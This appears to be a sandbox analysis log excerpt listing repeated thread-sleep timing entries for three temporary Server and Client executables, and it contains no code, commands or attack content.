Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -589479s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -589328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -589140s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588993s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -588015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -587853s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -587560s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -587265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -587125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -586961s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -586781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -586635s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -586421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -586218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -585984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -585750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -585585s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -585421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -585031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -584812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -584515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -584203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -583843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -583531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -583307s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -583112s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -582562s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -582281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -582078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -581921s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -581687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -581423s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -581258s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -581046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -580862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -580671s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -580265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -580077s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -579875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -579709s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -579492s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -579296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -578953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -578484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -578078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -577734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -577484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -577341s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -577125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -576937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -576703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -576468s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -576318s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -576125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -575937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -575781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -575627s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -599359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -599031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -598495s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -598168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -597947s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -597734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -597031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -199530s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -99125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98786s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -595184s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -594775s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -594615s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -99359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -99171s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -99026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016	Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 5432	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 7196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -37815825351104557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -599101s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -598026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -597719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -597453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -597125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -596078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -593922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -593500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -593047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -592766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -592438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -591907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -591610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -591313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -591105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -590891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -590575s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -590328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -589985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -589413s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -589194s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -588911s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -588672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -588489s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -588281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -588047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -587813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -587625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -587391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -587172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -586953s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -586719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -586557s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -586359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -586177s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -585984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -585824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -585625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -585391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -585172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -584946s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -584782s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -584531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -584297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -584032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -583794s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -583594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -583450s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -583188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -582969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -582735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -582500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -582324s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -582125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -581844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -581625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -581297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -580961s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -580750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -580578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -580391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -580102s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -579910s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -579705s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -579500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -579250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -579028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -578688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -578499s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -578203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -577938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -577656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -577344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -577094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -576844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -576563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -576282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -576057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -575797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -575578s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -575352s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -575078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -574813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -574532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -574281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -574047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -573891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -573700s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -573469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -573250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -573016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -572828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -572625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -572375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -572125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -571938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -571709s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -571469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -571219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -571016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -570813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -570594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -570297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -569907s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -569625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -569422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -569227s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -569016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -568779s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -568618s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -568406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -568208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -567719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -567438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -567226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -567031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -566857s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -566690s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -566496s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -566305s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -566031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -565828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -565625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -565391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -565183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -564891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -564688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -564514s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -564297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -564078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -563844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -563328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -563123s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -562906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -562688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -562391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -562195s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -561985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -561735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496	Thread sleep time: -561516s >= -30000s
